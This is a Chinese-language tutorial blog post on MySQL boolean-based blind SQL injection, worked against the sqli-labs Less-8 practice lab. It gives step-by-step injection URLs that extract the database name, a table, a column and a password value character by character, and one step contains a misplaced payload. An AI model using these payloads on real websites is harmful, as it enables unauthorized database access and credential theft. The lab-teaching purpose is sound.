Mysql注入 -- 布尔注入

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
云数据库 RDS MySQL,高可用系列 2核4GB
简介: Mysql注入 -- 布尔注入

一、常用函数

1、mid(str,1,5):取字符串str的前5个字节

2、ord():转换成ASCII码

3、length():统计长度

4、 ascii():将字符转换ASCII

0a2653c851af460fa595bd959398a8f1.png

二、实例演示

1、and 1=1

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=1 --+ 返回正确

0eacb84100b54626af849e6b562bf92a.png

2、and 1=2

访问http://192.168.139.129/sqli/Less-8/?id=1' and 1=2 --+ 返回错误

2d65d23f6d4748949b924e4057485923.png

3、判断数据库长度

http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=8 --+返回正常,说明数据库长度为8
http://192.168.139.129/sqli/Less-8/?id=1' and length(database())>=9 --+返回错误

4、判断数据库第一个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),1,1)='s' --+ 不停的修改二十六个字母,知道正确为之http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

5、判断数据库第二个字母

http://192.168.139.129/sqli/Less-8/?id=1' and mid(database(),2,1)='e' --+ 最终获取数据库的名称为“security”

6、获取表名,最终获取表名users

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)='u' --+

7、获取字段名,最终获取字段名password

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select column_name from information_schema.columns where table_name='users' limit 12,1),1,1)='p' --+

8、获取字段内容,最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-8/?id=1' and mid((select password from users limit 8,1),1,1)='a' --+

禁止非法,后果自负

相关实践学习
每个IT人都想学的“Web应用上云经典架构”实战
本实验从Web应用上云这个最基本的、最普遍的需求出发,帮助IT从业者们通过“阿里云Web应用上云解决方案”,了解一个企业级Web应用上云的常见架构,了解如何构建一个高可用、可扩展的企业级应用架构。
MySQL数据库入门学习
本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品:云数据库RDS MySQL 版 阿里云关系型数据库RDS(Relational Database Service)是一种稳定可靠、可弹性伸缩的在线数据库服务,提供容灾、备份、恢复、迁移等方面的全套解决方案,彻底解决数据库运维的烦恼。 了解产品详情: https://www.aliyun.com/product/rds/mysql 
目录
相关文章
|
6月前
|
SQL 安全 关系型数据库
mysql注入-字符编码技巧
通过字符编码技巧,攻击者可以在SQL注入中绕过常见的输入验证机制,成功攻击数据库。因此,理解这些技巧及其可能的攻击路径,对防御SQL注入至关重要。开发者应采取多层次的安全措施,确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查,可以有效地提高系统的安全性,防止SQL注入攻击带来的风险。
207 72
|
存储 关系型数据库 MySQL
Mysql有布尔(BOOL)类型吗
Mysql有布尔(BOOL)类型吗
1442 0
|
关系型数据库 MySQL
Mysql注入 -- 注入类型
Mysql注入 -- 注入类型
73 1
|
安全 关系型数据库 MySQL
Mysql注入 -- 数据库导出及读文件
Mysql注入 -- 数据库导出及读文件
167 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 联合注入
Mysql注入 -- 联合注入
84 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 延时注入
Mysql注入 -- 延时注入
321 0
|
安全 关系型数据库 MySQL
Mysql注入 -- 报错注入
Mysql注入 -- 报错注入
115 0
|
安全 关系型数据库 MySQL
MySQL注入 -- 宽字节注入
MySQL注入 -- 宽字节注入
98 0
|
SQL 关系型数据库 MySQL
Mysql注入 -- 堆叠注入
Mysql注入 -- 堆叠注入
246 0
|
3月前
|
人工智能 运维 关系型数据库
数据库运维:mysql 数据库迁移方法-mysqldump
本文介绍了MySQL数据库迁移的方法与技巧,重点探讨了数据量大小对迁移方式的影响。对于10GB以下的小型数据库,推荐使用mysqldump进行逻辑导出和source导入;10GB以上可考虑mydumper与myloader工具;100GB以上则建议物理迁移。文中还提供了统计数据库及表空间大小的SQL语句,并讲解了如何使用mysqldump导出存储过程、函数和数据结构。通过结合实际应用场景选择合适的工具与方法,可实现高效的数据迁移。
580 1

推荐镜像

更多